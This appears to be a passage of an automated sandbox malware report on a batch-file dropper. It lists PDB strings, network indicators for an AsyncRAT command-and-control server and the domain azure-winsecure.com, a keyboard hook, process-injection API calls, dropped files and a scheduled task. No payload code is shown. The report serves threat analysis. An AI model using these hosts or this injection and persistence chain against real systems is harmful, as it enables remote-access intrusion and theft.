Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbpl source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Management.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Core.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdbx*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Transactions.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: C:\Windows\System32\cmd.exe; Code function: 17_2_00000253FC40D894 FindFirstFileExW,17_2_00000253FC40D894
Source: C:\Windows\System32\cmd.exe; Code function: 17_2_00000253FC40DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00000253FC40DA18
Source: C:\Windows\System32\cmd.exe; Code function: 17_2_00000253FC43D894 FindFirstFileExW,17_2_00000253FC43D894
Source: C:\Windows\System32\cmd.exe; Code function: 17_2_00000253FC43DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00000253FC43DA18
Source: C:\Windows\System32\conhost.exe; Code function: 18_2_000002A5AF36D894 FindFirstFileExW,18_2_000002A5AF36D894
Source: C:\Windows\System32\conhost.exe; Code function: 18_2_000002A5AF36DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_000002A5AF36DA18
Source: C:\Windows\System32\conhost.exe; Code function: 37_2_000001780DD2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_000001780DD2DA18
Source: C:\Windows\System32\conhost.exe; Code function: 37_2_000001780DD2D894 FindFirstFileExW,37_2_000001780DD2D894
Source: C:\Windows\System32\dllhost.exe; Code function: 38_2_0000020175EBDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_0000020175EBDA18
Source: C:\Windows\System32\dllhost.exe; Code function: 38_2_0000020175EBD894 FindFirstFileExW,38_2_0000020175EBD894
Source: C:\Windows\System32\dllhost.exe; Code function: 38_2_0000020175EEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_0000020175EEDA18
Source: C:\Windows\System32\dllhost.exe; Code function: 38_2_0000020175EED894 FindFirstFileExW,38_2_0000020175EED894
Source: C:\Windows\System32\winlogon.exe; Code function: 39_2_000002D0165ED894 FindFirstFileExW,39_2_000002D0165ED894
Source: C:\Windows\System32\winlogon.exe; Code function: 39_2_000002D0165EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_000002D0165EDA18
Source: C:\Windows\System32\winlogon.exe; Code function: 39_2_000002D01661D894 FindFirstFileExW,39_2_000002D01661D894
Source: C:\Windows\System32\winlogon.exe; Code function: 39_2_000002D01661DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_000002D01661DA18

Networking

Source: Network traffic; Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 154.216.20.132:6969 -> 192.168.2.6:59172
Source: global traffic; TCP traffic: 192.168.2.6:59172 -> 154.216.20.132:6969
Source: Joe Sandbox View; IP Address: 147.135.36.89
Source: Joe Sandbox View; ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; DNS query: name: ipwho.is
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Host: ipwho.is Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Host: ipwho.is Connection: Keep-Alive
Source: global traffic; DNS traffic detected: DNS query: azure-winsecure.com
Source: global traffic; DNS traffic detected: DNS query: ipwho.is
Source: Microsoft-Windows-LiveId%4Operational.evtx.49.dr; String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3421815626.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770090274.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3421815626.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770090274.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000028.00000000.2769648555.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000028.00000000.2769294113.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3406704355.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000008.00000002.2649694624.000001D4A93CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3421815626.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770090274.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0I
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2775061134.000001B4A4A21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000028.00000000.2769294113.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3406704355.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: Amcache.hve.11.dr | String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000019.00000002.3432949177.0000021404730000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co.1mmi
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, Null.25.dr, Null.8.dr | String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2775061134.000001B4A4A21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6xG
Source: powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A5B64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.2649694624.000001D4A93CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 59173 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 59173
Source: unknown | HTTPS traffic detected: 147.135.36.89:443 -> 192.168.2.6:59173 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Source: Process Memory Space: powershell.exe PID: 6444, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7088, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: rbx-CO2.bat | Static file information: 5214429
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343EE0C8 NtUnmapViewOfSection
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343EE122 NtSetContextThread
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343EE142 NtResumeThread
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343EE0FA NtWriteVirtualMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343EE0A8 NtUnmapViewOfSection
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343F0C7D NtWriteVirtualMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343EE098 NtUnmapViewOfSection
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343EE132 NtSetContextThread
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343F0A5E NtUnmapViewOfSection
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343F0F40 NtSetContextThread
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343F1004 NtResumeThread
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle
Source: C:\Windows\System32\winlogon.exe | Code function: 39_2_000002D0165E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\$rbx-onimai2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\System32\Tasks\$rbx-FHOIapsb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_f4o4oimb.n1j.ps1
Source: C:\Windows\System32\cmd.exe | Code function: 17_3_00000253FC3DCC94
Source: C:\Windows\System32\cmd.exe | Code function: 17_3_00000253FC3DCE18
Source: C:\Windows\System32\cmd.exe | Code function: 17_3_00000253FC3D23F0
Source: C:\Windows\System32\cmd.exe | Code function: 17_2_00000253FC40D894
Source: C:\Windows\System32\cmd.exe | Code function: 17_2_00000253FC40DA18
Source: C:\Windows\System32\cmd.exe | Code function: 17_2_00000253FC402FF0
